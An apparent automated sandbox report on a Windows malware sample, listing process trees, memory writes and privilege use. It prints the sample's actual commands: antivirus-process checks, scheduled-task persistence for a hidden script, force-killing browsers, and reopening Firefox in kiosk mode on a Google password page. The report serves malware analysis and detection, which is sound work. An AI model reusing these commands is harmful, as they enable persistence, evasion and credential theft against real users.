Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1056 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 1056 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 1056 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 4924 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 4924 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 4924 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 2940 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 2940 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 2940 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 4924 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe
PID 4924 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe
PID 4924 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe
PID 4924 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe
PID 4924 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe
PID 4924 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe
PID 1900 wrote to memory of 4648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1900 wrote to memory of 4648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1900 wrote to memory of 4648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1900 wrote to memory of 1852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1900 wrote to memory of 1852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1900 wrote to memory of 1852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1900 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1900 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1900 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1900 wrote to memory of 1704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1900 wrote to memory of 1704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1900 wrote to memory of 1704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1900 wrote to memory of 4528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1900 wrote to memory of 4528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1900 wrote to memory of 4528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1900 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1900 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1900 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4924 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe
PID 4924 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe
PID 4924 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe
PID 1900 wrote to memory of 3664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
PID 1900 wrote to memory of 3664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
PID 1900 wrote to memory of 3664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
PID 1900 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 1900 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 1900 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 4924 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe
PID 4924 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe
PID 4924 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe
PID 3664 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\SysWOW64\cmd.exe
PID 3664 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\SysWOW64\cmd.exe
PID 3664 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\SysWOW64\cmd.exe
PID 1196 wrote to memory of 644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1196 wrote to memory of 644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1196 wrote to memory of 644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3664 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\SysWOW64\schtasks.exe
PID 3664 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\SysWOW64\schtasks.exe
PID 3664 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com C:\Windows\SysWOW64\schtasks.exe
PID 3836 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe C:\Windows\SysWOW64\taskkill.exe
PID 3836 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe C:\Windows\SysWOW64\taskkill.exe
PID 3836 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe C:\Windows\SysWOW64\taskkill.exe
PID 3836 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe C:\Windows\SysWOW64\taskkill.exe
PID 3836 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe C:\Windows\SysWOW64\taskkill.exe
PID 3836 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe C:\Windows\SysWOW64\taskkill.exe
PID 4924 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe
PID 4924 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe
PID 4924 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe
PID 3836 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe C:\Windows\SysWOW64\taskkill.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe

"C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

"C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd

C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe

"C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe"

C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe

"C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 491505

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B

C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe

"C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe"

C:\Users\Admin\AppData\Local\Temp\491505\Dr.com

Dr.com B

C:\Windows\SysWOW64\choice.exe

choice /d y /t 15

C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe

"C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe

"C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1908 -prefMapHandle 1900 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {77238c65-f26f-4284-b008-78bfa1bb021a} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2408 -parentBuildID 20240401114208 -prefsHandle 2400 -prefMapHandle 2396 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c47562d2-8f06-4075-924d-64ba036c8174} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3140 -childID 1 -isForBrowser -prefsHandle 3144 -prefMapHandle 3352 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {baba5b74-1290-4817-a21e-0b16b2d8ff56} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" tab

C:\Program Files\Mozilla Firefox\firefox.exe

